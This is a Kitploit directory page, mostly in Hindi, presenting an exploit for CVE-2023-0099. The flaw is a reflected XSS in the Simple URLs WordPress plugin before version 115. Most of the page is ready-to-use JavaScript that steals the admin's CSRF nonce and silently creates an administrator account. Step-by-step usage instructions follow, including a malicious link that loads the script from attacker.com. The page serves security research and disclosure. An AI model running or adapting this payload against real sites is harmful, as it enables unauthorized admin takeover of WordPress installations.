Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-0099-exploit — सरल URL < 115 - Reflected XSS | Kitploit
उपकरण/GitHubGitHub/amirzargham/cve-2023-0099-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubamirzargham/cve-2023-0099-exploit

CVE-2023-0099-exploit

सरल URL < 115 - Reflected XSS

रिपॉजिटरी देखें
612 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-0099-exploit

शोषण शीर्षक: simple urls < 115 - Reflected XSS

गूगल डॉर्क:

शोषण लेखक: AmirZargham

विक्रेता होमपेज: https://getlasso.co/

सॉफ्टवेयर लिंक: https://wordpress.org/plugins/simple-urls/

संस्करण: < 115

परीक्षण किया गया: firefox,chrome

CVE: CVE-2023-0099

CWE: CWE-79

प्लेटफॉर्म: MULTIPLE

प्रकार: WebApps

विवरण Simple URLs WordPress प्लगइन (संस्करण 115 से पहले) कुछ पैरामीटरों को आउटपुट करने से पहले उन्हें sanitize और escape नहीं करता है, जिससे Reflected Cross-Site Scripting हो सकता है, जिसका उपयोग उच्च विशेषाधिकार वाले उपयोगकर्ताओं (जैसे व्यवस्थापक) के विरुद्ध किया जा सकता है।

शोषण:

root@kitploit:~
function getCSRFToken(url, csrf_token_id, func){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var parser = new DOMParser();
var htmlDocument = parser.parseFromString(this.responseText, "text/html");
var token = htmlDocument.getElementById(csrf_token_id).value;
func(token);
}

};
xhr.open("GET", url, true);
xhr.withCredentials = true;
xhr.send();

}

function addAdmin(token){
var xhr = new XMLHttpRequest();
xhr.open("POST","http://vulnerable.site/wp-admin/user-new.php", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=hack-admin&[email protected]&first_name=&last_name=&url=&pass1=1234&pass2=1234&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
}

getCSRFToken("http://vulnerable.site/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);

उपयोग जानकारी:

  1. एक्सप्लॉइट कोड को सर्वर पर जावास्क्रिप्ट फ़ाइल के रूप में सहेजें।
  2. एक्सप्लॉइट फ़ाइल में मान बदलें:
    • user_login: मनमाना उपयोगकर्ता नाम
    • pass1: मनमाना पासवर्ड
    • pass2: मनमाना पासवर्ड
    • email: मनमाना ईमेल
  3. अब पीड़ित को दुर्भावनापूर्ण लिंक भेजें: https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=</script><script src="https://attacker.com/exploit.js"></script>
  4. जान लें कि व्यवस्थापक उपयोगकर्ता बन गया है, /wp-admin या अन्य पर जाएं, और वर्डप्रेस पैनल में लॉगिन करें।

प्रकाशित: exploit-db.

प्रकाशित: 0day.today.

प्रकाशित: packet storm.

टूल डाउनलोड करें